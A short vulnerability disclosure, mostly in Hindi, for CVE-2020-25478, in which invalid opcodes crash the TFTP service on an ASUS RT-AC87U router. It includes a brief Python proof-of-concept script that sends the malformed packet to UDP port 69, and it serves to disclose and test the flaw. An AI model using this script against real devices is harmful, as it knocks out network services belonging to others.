
ASUS RT-AC87U TFTP is vulnerable to Denial of Service(DoS) attack
CVE-2020-25478 - ASUS RT-AC87U TFTP Denial of Service (DoS) हमले के प्रति संवेदनशील है
ASUS RT-AC87U 3.0.0.4.382_51640
यह मुख्य रूप से CWE-20 से संबंधित है, ASUS RT-AC87U पर चलने वाली TFTP सेवा Denial of Service (DoS) हमले के प्रति संवेदनशील है जब सेवा को अमान्य opcode भेजा जाता है। निम्नलिखित पायथन कोड स्निपेट का उपयोग कमजोरी के परीक्षण के लिए किया जाता है:
import socket
import sys
tftpd = ('192.168.1.1', 69)
#Try and open an UDP SOCKET
try:
tftp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
print("Failed on socket creation, so exiting")
sys.exit(1)
#create a invalid opcode exeeding the 2 byte length
# opcode operation
# 1 Read request (RRQ)
# 2 Write request (WRQ)
# 3 Data (DATA)
# 4 Acknowledgment (ACK)
# 5 Error (ERROR)
invalidOpcode = "0000"
tftp.sendto(invalidOpcode,tftpd)
3. विवरण
Asus RT-AC87U संस्करण 3.0.0.4.382_51640 TFTP सेवा पर denial of service हमले के प्रति संवेदनशील है जिससे TFTP सेवा क्रैश हो जाती है। TFTP सेवा अमान्य opcode भेजकर दूरस्थ रूप से क्रैश होने की संभावना रखती है।
https://www.asus.com/content/ASUS-Product-Security-Advisory/